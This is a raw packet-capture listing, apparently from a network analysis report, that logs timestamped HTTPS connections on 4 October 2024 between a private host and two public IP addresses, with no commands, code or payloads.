                                                                                                                                        Oct 4, 2024 10:50:43.163554907 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:43.164568901 CEST49732443192.168.11.20142.251.40.206
                                                                                                                                        Oct 4, 2024 10:50:43.164648056 CEST44349732142.251.40.206192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.349034071 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:43.349165916 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.349370003 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:43.349488020 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:43.349545002 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.611007929 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.611376047 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:43.616281033 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:43.616321087 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.616982937 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.617198944 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:43.617400885 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:43.660187006 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.864609003 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.864830017 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.864830017 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.880912066 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.881268024 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.896915913 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.897089005 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.897089958 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.897144079 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.897408962 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.975327969 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.975550890 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.975630999 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.975923061 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.979456902 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.979688883 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.979770899 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.980041981 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.987548113 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.987771988 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.987869978 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.988076925 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.996140003 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.996357918 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:45.996448040 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:45.996710062 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.003535032 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.003786087 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.003870964 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.004156113 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.011831045 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.012042046 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.012130022 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.012350082 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.019759893 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.020015001 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.020095110 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.020333052 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.020970106 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.021250010 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.028736115 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.028954983 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.029036999 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.029392958 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.035145998 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.035352945 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.035437107 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.035705090 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.042648077 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.042912006 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.042992115 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.043296099 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.050873995 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.051098108 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.051179886 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.051532984 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.057864904 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.058084965 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.058166981 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.058367968 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.064889908 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.065232992 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.068540096 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.068778992 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.068888903 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.069144011 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.087224007 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.087456942 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.087534904 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.087732077 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.089541912 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.089761972 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.089833021 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.090138912 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.096385002 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.096596003 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.096682072 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.096951008 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.102436066 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.102655888 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.102741957 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.103008032 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.108331919 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.108544111 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.108628035 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.108992100 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.114767075 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.114959955 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.115024090 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.115056038 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.115336895 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.119366884 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.119561911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.119666100 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.119950056 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.124914885 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.125129938 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.125211000 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.125566006 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.130379915 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.130703926 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.130783081 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.131145000 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.136483908 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.136709929 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.136796951 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.137063980 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.144659996 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.144876957 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.144979954 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.145350933 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.147339106 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.147641897 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.150136948 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.150333881 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.150448084 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.150726080 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.150796890 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.151043892 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.156513929 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.156714916 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.156805992 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.157104015 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.161313057 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.161525011 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.161607027 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.161907911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.167435884 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.167609930 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.167701960 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.168039083 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.174211025 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.174432993 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.174511909 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.174848080 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.177535057 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.177752972 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.177834988 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.178184986 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.182687044 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.182914972 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.182997942 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.183249950 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.187454939 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.187670946 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.187777042 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.188059092 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.193305969 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.193543911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.193623066 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.193972111 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.198766947 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.198981047 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.199065924 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.199352980 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.203507900 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.203727961 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.203821898 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.204113960 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.206860065 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.207062960 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.207145929 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.207494020 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.209979057 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.210242033 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.211498976 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.211904049 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.211987972 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.212224960 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.214503050 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.214760065 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.214840889 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.215172052 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.217495918 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.217715025 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.217803001 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.218086958 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.220920086 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.221122980 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.221200943 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.221507072 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.226521969 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.226731062 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.226804972 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.226838112 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.227027893 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.227089882 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.227366924 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.231620073 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.231842995 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.231940985 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.232166052 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.232841015 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.233047009 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.233146906 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.233402014 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.235265017 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.235476017 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.235565901 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.235862017 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.237947941 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.238205910 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.238497019 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.238753080 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.240955114 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.241177082 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.241261005 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.241519928 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.243736029 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.243946075 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.244034052 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.244256020 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.246519089 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.246778011 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.247965097 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.248239040 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.248346090 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.248625994 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.250922918 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.251148939 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.251231909 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.251487017 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.253495932 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.253709078 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.253783941 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.254051924 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.257800102 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.258013010 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.258097887 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.258356094 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.258785963 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.258999109 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.259069920 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.259423018 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.261209965 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.261430025 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.261509895 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.261769056 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.264075041 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.264295101 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.264364958 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.264611959 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.266930103 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.267183065 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.267250061 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.267515898 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.268939972 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.269143105 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.269222021 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.269469023 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.271567106 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.271819115 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.271879911 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.272141933 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.274394035 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.274647951 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.274714947 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.275038004 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.276792049 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.277004004 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.277075052 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.277467012 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.279473066 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.279723883 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.281327009 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.281613111 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.281729937 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.281975031 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.282773972 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.283034086 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.283092022 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.283370018 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.285615921 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.285923958 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.285993099 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.286252975 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.287512064 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.287723064 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.287781954 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.288002968 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.289828062 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.290072918 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.290131092 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.290397882 CEST49733443192.168.11.20142.250.80.97
